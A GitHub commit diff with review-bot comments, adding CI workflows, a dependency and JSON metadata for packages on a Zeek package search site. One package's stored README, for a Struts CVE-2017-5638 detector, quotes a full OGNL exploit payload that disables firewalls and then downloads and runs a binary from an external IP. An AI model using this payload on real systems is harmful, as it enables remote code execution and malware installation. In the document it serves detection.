Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing 230 changed files with 391 additions and 27 deletions.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
# BUILDS AND RUNS DOCKER IMAGE | ||
name: Build | ||
|
||
on: | ||
push: | ||
branches: | ||
# any branch | ||
- '**' | ||
|
||
jobs: | ||
test: | ||
runs-on: ubuntu-latest | ||
|
||
steps: | ||
- name: Checkout | ||
uses: actions/checkout@v4 | ||
|
||
- name: Build Docker Image | ||
run: docker build -t zeek_website . --no-cache | ||
|
||
- name: Start Docker Service | ||
run: docker-compose up -d | ||
|
||
- name: Stop Docker Service | ||
run: docker-compose down | ||
|
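Review bot: the "Start Docker Service" step is followed directly by "Stop Docker Service", so the job never verifies that the service actually came up; `docker-compose up -d` returns as soon as the containers are created, and a container that exits on startup still yields a green build. Add a step between them that waits briefly and then checks container state and a request against the service (for example `docker compose ps` plus a curl against the app's listening port), or run compose in the foreground with a failing exit code propagated. Two smaller points in the same hunk: the `docker build -t zeek_website .` tag is never referenced by the compose steps, so confirm the compose file actually uses that image rather than silently rebuilding its own; and current `ubuntu-latest` runners ship the `docker compose` v2 plugin, so prefer `docker compose` over the legacy `docker-compose` binary to avoid a missing-command failure when the image is refreshed.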
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
# RUNS TEST SUITE | ||
name: Test Suite | ||
|
||
on: | ||
push: | ||
branches: | ||
# any branch | ||
- '**' | ||
|
||
jobs: | ||
test: | ||
runs-on: ubuntu-latest | ||
|
||
steps: | ||
- name: Checkout | ||
uses: actions/checkout@v4 | ||
|
||
- name: Set up Python | ||
uses: actions/setup-python@v4 | ||
with: | ||
python-version: '3.10' | ||
|
||
- name: Install dependencies | ||
run: | | ||
python -m pip install --upgrade pip | ||
pip install -r requirements.txt | ||
- name: Run Unit Tests | ||
run: | | ||
cd zeek-package-website && pytest -s --showlocals tests/test_parser.py | ||
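Review bot: the "Install dependencies" step runs `pip install -r requirements.txt` from the repository root while the test step does `cd zeek-package-website` before invoking pytest; confirm that `requirements.txt` really lives at the root, otherwise this step fails on a fresh checkout. The test step also runs only `tests/test_parser.py` rather than the `tests/` directory, so any other test module added later is silently skipped; `pytest -s --showlocals tests/` would cover the directory. Note that `--showlocals` dumps every local variable of a failing test into the public CI log, so keep credentials and tokens out of test locals. Both actions are pinned by major tag (`actions/checkout@v4`, `actions/setup-python@v4`); pinning to a full commit SHA is the usual hardening for third-party actions.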
@@ -12,3 +12,4 @@ fastapi_utils | |
mistune | ||
markdown | ||
pytest | ||
requests |
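Review bot: `requests` is added without a version specifier, matching the unpinned `mistune`, `markdown` and `pytest` entries above it, so the Test Suite workflow installs whatever the latest release is on the day it runs and CI results are not reproducible. Pin versions (`requests==<version>`) and, for supply-chain protection, consider generating a hash-locked file and installing with `pip install --require-hashes -r requirements.txt`.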
Empty file.
zeek-package-website/app/api/search/json_files/Apple-RDP-net-assistant-DoS.git.json (1 change: 1 addition & 0 deletions)
@@ -0,0 +1 @@ | ||
{"description": "udp-3283-DoS", "tags": "net_listerner, Apple RDP, udp DoS", "version": "master", "depends": null, "test_cmd": "( cd tests && btest -d )", "build_cmd": null, "url": "https://github.com/initconf/Apple-RDP-net-assistant-DoS.git", "summary": null, "script_dir": "scripts", "plugin_dir": null, "readme": "=================================================================================\nSimple policy to detect Apple 3283/udp DoS attack Candidate \n=================================================================================\n\nFollowing functionality are provided by the script\n--------------------------------------------------\n::\n 1) identifies spoofed traffic and subsiquent DNS amplification attack\n\t2) builds you a list of possible sources which are responding to 3283/udp DNS amplification attack with Apple RDP\n\nInstallation\n------------\n\tbro-pkg install bro/initconf/Apple-RDP-net-assistant-DoS\n\tor\n\t@load Apple-RDP-net-assistant-DoS/scripts \n\n\nDetailed Notes:\n---------------\n\nDetail Alerts and descriptions: Following alerts are generated by the script:\n******************************************************************************\n\nHeuristics are simple: check for \n\nThis should generate following Kinds of notices:\n\n\nExample notice: \n***************************\n\nExample Summary Notice: \n***************************\n\n\n\n"} |
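Review bot: `tags` is stored as a single comma-separated string (`"net_listerner, Apple RDP, udp DoS"`) rather than a JSON array, so the search code has to split and trim it and cannot distinguish a comma inside a tag from a separator. Emitting `tags` as a list when the generator writes these files would make the search index unambiguous. The README text is carried over verbatim from the upstream package, including its stale `bro-pkg install` instruction, so nothing in this repository should be changed for that.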
@@ -0,0 +1 @@ | ||
{"description": "Binary Heap Implementation", "tags": "zeek, zeek.org, BinaryHeap", "version": "master", "depends": null, "test_cmd": null, "build_cmd": null, "url": "https://github.com/jmellander/BinaryHeap", "summary": null, "script_dir": "scripts", "plugin_dir": null, "readme": "# BinaryHeap\n\nThe goal of this package is to provide a binary heap package for Zeek that can be used in multiple applications:\n\n\tPriority queue: can be efficiently implemented using a binary heap in O(logn) time.\n\tIncremental sorting: can be performed using a binary heap.\n\tOrder Statistics: efficiently find the kth smallest (or largest) elements in an array.\n\nThis implementation includes the following main functions:\nCreate Heap with compare function\n\tBuilt in MinHeap & MaxHeap functions\nAdd to Heap\nDelete from Heap\nModify Item in Heap\nReturn root of Heap\nPeek at root\nReplace root with new item and rebalance.\n\nAnd a number of utility functions\nSize of Heap\nReturn value of specific item by key\nDetermine if item by key is in Heap\n\nData structures & Functions\n\nBasic user item:\n\n```\ntype Item: record {\n key: string &optional;\nval: double &optional;\n};\n```\n\nThe heap definition:\n\n```\ntype Heap: record {\nheap: table[count] of Item; # The binary heap itself\n idx: table[string] of count; # map of key to location in binary heap\n cmp: function(a: double, b:double): double;\n};\n```\n\nCreate a Heap:\n\n```\nInit: function(cmp: function(a: double, b:double): double): Heap;\n```\nThis function returns an empty Heap record, initialized. cmp is the comparison function to determine whether to swap items. 
Not usually used.\n \n```\nMinHeap: function(): Heap;\n```\nThis calls Init with an appropriate cmp() function that structures the Heap as a MinHeap.\n\n```\nMaxHeap: function(): Heap;\n```\nCreates a MaxHeap ala MinHeap\n\n```\nAdd: function(a: Heap, var: Item): bool;\n```\nAdds an Item to Heap, returns F if var$key already exists, T upon success\n\n```\nModify: function(a: Heap, var: Item): bool;\n```\nModifies an Item already in Heap to var$val, returns F if var$key doesn\u2019t exist, T upon success\n\n```\nUpdate:function(a: Heap, var: Item);\n```\nUpdates or adds an Item in heap. If var$key exists, add var$item to current value,\nOtherwise add Item to Heap\n\n```\nDelete: function(a: Heap, var: Item): bool;\n```\nDelete Item var$key from Heap, var$val unused. Return T is var$key was in Heap, otherwise F\n\n```\nPeek: function(a: Heap): Item;\n```\nReturns Item at root of Heap, without deleting from Heap, or empty Item if Heap is empty\n\n```\nRoot: function(a: Heap): Item;\n```\nReturns Item at root of Heap, and deletes it from Heap, or empty Item if Heap is empty\n\n```\nRootAndAdd: function(a: Heap, var: Item): Item;\n```\nThis function combines in an efficient way the Root() function, and the Add() function\n\n```\nIsIn: function(a: Heap, var: Item): bool;\n```\nReturns T or F depending on whether var$key is in the heap\n\n```\nSize: function(a: Heap): count;\n```\nReturns number of Items in Heap\n\n```\nValue: function(a: Heap, var: Item): Item;\n```\nReturns Item that corresponds to var$key, or empty Item if non-existant\n\n\nUsage Example\n\n```\nevent bro_init()\n\t{\n\t# Randomize\n\tsrand(double_to_count(time_to_double(current_time())));\n\n\t# Initialize a MinHeap\n\n\tlocal MyHeap = BinaryHeap::MaxHeap();\n\tlocal item:BinaryHeap::Item;\n\n\t# Lets add random values & keys\n\tlocal i=1000;\n\twhile (i > 0)\n\t\t{\n\t\titem = [$val=rand(100000) + 0.0, $key=md5_hash(rand(1000000))];\n\t\tBinaryHeap::Add(MyHeap, item);\n\t\t--i;\n\t\t}\n\n\t# Now 
print them out, highest first\n\twhile (BinaryHeap::Size(MyHeap) > 0)\n\t\t{\n\t\titem=BinaryHeap::Root(MyHeap);\n\t\tprint item;\n\t\t}\n\texit(0);\n\t}\n```\n\n\n"} |
zeek-package-website/app/api/search/json_files/CVE-2017-5638_struts.json (1 change: 1 addition & 0 deletions)
@@ -0,0 +1 @@ | ||
{"description": "package to detect CVE-2017-5638 struts attack", "tags": "CVE-2017-5638, struts", "version": "master", "depends": null, "test_cmd": null, "build_cmd": null, "url": "https://github.com/initconf/CVE-2017-5638_struts", "summary": null, "script_dir": "scripts", "plugin_dir": null, "readme": "I extended Scott Campbell's script further, made it more complicated :)\n\nWhile \"HTTP_StrutsAttack\" will stop 100% of the recon, there was still miniscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, vulnerable system might still do the wget included in the HTTP request and execute the malware. Since we aren't blocking the malware download IP in wget URL which is almost always a different one then recon IP.\n\nSo the extended script also extracts the malware download IP\n\n1) Generate the following notices:\n\n redef enum Notice::Type += {\n Attempt,\n MalwareURL,\n HostileDomainLookup,\n MalwareURLClick,\n FileDownload,\n Compromise,\n };\n\n\n- So now this script will extract the \"wget\" URL from Attempt and then if the URL has a domain (or cnamed domain) script will further track down the IP addresses of malware host and watch for activity.\n\n- if wget URL is seen in http, we'd generate a MalwareURLClick notice\n\n- further notices for FileDownload and Compromise.\n\n- This script is also clusterized.\n\nI ran it over 24 hours and things look stable with respect to script. I am still sure there might be some lame detection holes. so\n feel free to modify and let me know too.\n\nSurprisingly, unlike previous times, I don't see huge volume of Struts scanners. 
I am seeing in range of ~20's a day instead of ~1\n000's a day.\n\nHere is example notices:\n\n1489228734.171565 CbVq832QovIwAQddf2 1.24.191.108 65000 131.243.X.Y 80 - - - tcp Struts::Attempt CVE-2017-5638/Struts attack from 1.24.191.108 seen: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} - 1.24.191.108 131.243.X.Y 80 - worker-5 Notice::ACTION_LOG 3600.000000 F - -- - -\n\n\n1489237401.399275 C90k4o1Zrn8D7vaXoe 124.117.244.34 49728 128.3.Y.Z 80 - - - tcp Struts::MalwareURL Struts Hostile URLs seen in recon attempt 124.117.244.34 to 128.3.Y.Z with URL [http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;] - 124.117.244.34 128.3.Y.Z 80 - worker-13 Notice::ACTION_LOG 3600.000000 F - - - - -\n\n\n\n1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::MalwareURLClick Struts Hostile URL seen 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 60.000000 F - - - - -\n\n\n1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::Compromise Struts 
compromise: 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F - - - - -\n\n\n1489240940.206456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 Frx9jZ1JkcrsVtgOkg application/x-executable http://121.42.249.245:1996/tcp/xhx tcp Struts::FileDownload http://121.42.249.245:1996/tcp/xhx http://121.42.249.245:1996/tcp/xhx 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F\n"} |
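Review bot: the `readme` field stores the upstream package's text verbatim, and in this case it contains a full OGNL exploit string together with external IP addresses and a download URL. Since `mistune` and `markdown` are in `requirements.txt`, this content is presumably rendered into HTML on the package pages; the README of a third-party package is untrusted input, so render it with HTML escaping enabled or pass it through a sanitizer before it reaches the browser, otherwise a crafted README can inject markup into the site. Also worth deciding whether the search API should serve these raw strings at all, because some web filters will flag a response that embeds an exploit payload.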
zeek-package-website/app/api/search/json_files/CVE-2020-16898-Bad-Neighbor.git.json (1 change: 1 addition & 0 deletions)
@@ -0,0 +1 @@ | ||
{"description": "CVE-2020-16898: Bad Neighbor", "tags": "test_command = ( cd tests && btest -d )", "version": "master", "depends": null, "test_cmd": "( cd tests && btest -d )", "build_cmd": null, "url": "https://github.com/initconf/CVE-2020-16898-Bad-Neighbor.git", "summary": null, "script_dir": "scripts", "plugin_dir": null, "readme": "=================================================================================\nSimple policy to detect CVE-2020-16898: Bad Neighbor\n=================================================================================\n\nFollowing functionality are provided by the script\n--------------------------------------------------\n::\n 1) Script checks on heuristic described here:\n\t\thttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/\n\nInstallation\n------------\n\tzeek-pkg install zeek/initconf/CVE-2020-16898-Bad-Neighbor\n\tor\n\t@load CVE-2020-16898-Bad-Neighbor/scripts\n\n\nDetailed Notes:\n---------------\n\nDetail Alerts and descriptions: Following alerts are generated by the script:\n******************************************************************************\n\nHeuristics are simple: \n\nAs per : \nhttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/\n\n(i) looking for packets with an ICMPv6 Type field of 134 indicating Router Advertisements \n(ii) an ICMPv6 Option field of 25 indicating Recursive DNS Server (RDNSS). \n(iii) If this RDNSS option also has a length field value that is even, the heuristic would drop or flag the associated packet, as it is likely part of a Bad Neighbor exploit attempt.\n\n\nExample notice: ICMP::BadNeighbor \n***************************\n\nExample Summary Notice: \n***************************\n\n\n\n"} |
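Review bot: the `tags` value here is `"test_command = ( cd tests && btest -d )"`, which is the package's `test_command` metadata line, not a tag list (the same command correctly appears in `test_cmd`). The generator that produced these JSON files evidently read the wrong key when the package metadata has no `tags` entry, so every such package will be indexed under a bogus tag. Fix the metadata parser to emit `null` or an empty list when `tags` is absent, and add a case to `tests/test_parser.py` for a package whose metadata lacks `tags`.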
zeek-package-website/app/api/search/json_files/CVE-2020-16898.json (1 change: 1 addition & 0 deletions)
Large diffs are not rendered by default.